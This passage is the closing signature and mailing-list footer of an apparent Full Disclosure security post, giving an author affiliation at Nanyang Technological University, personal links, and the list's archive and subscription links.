Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
